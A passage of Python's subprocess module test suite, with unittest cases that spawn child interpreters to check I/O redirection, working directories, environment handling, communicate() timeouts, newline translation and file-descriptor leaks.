# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We append code that calls sys.exit() so that, whenever a Python
# executable is actually found and launched, it exits immediately
# instead of hanging the test runner.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
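# For contrast, the naive pattern that communicate() exists to avoid can
# deadlock once both OS pipe buffers fill up (illustrative sketch only):
#
#     p.stdin.write(big_blob)    # parent blocks: the child's stdin pipe is
#     p.stdin.close()            # full, while the child is itself blocked
#     data = p.stdout.read()     # writing to its own full stdout pipe.
#
# communicate() interleaves the reads and writes (select/poll on POSIX,
# worker threads on Windows) so neither side can stall the other.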
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build pushes something like "[42442 refs]\n"
# to stderr when the subprocess exits.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
import _bootlocale
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = _bootlocale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
_bootlocale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
_bootlocale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
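# Monkeypatching _bootlocale.getpreferredencoding is how this test forces the
# TextIOWrapper created by universal_newlines mode to use the encoding under
# test; it relies on private CPython machinery, which is why the patch is
# restored in the finally block. Later Python versions expose an encoding=
# parameter on Popen for the same purpose.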
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
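# bufsize=1 requests line buffering, which is only meaningful for text-mode
# pipes (universal_newlines=True); in binary mode the line is still sitting in
# the parent's write buffer when the fd is closed underneath it, so the child
# never receives it and the parent reads back b''.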
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen(["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
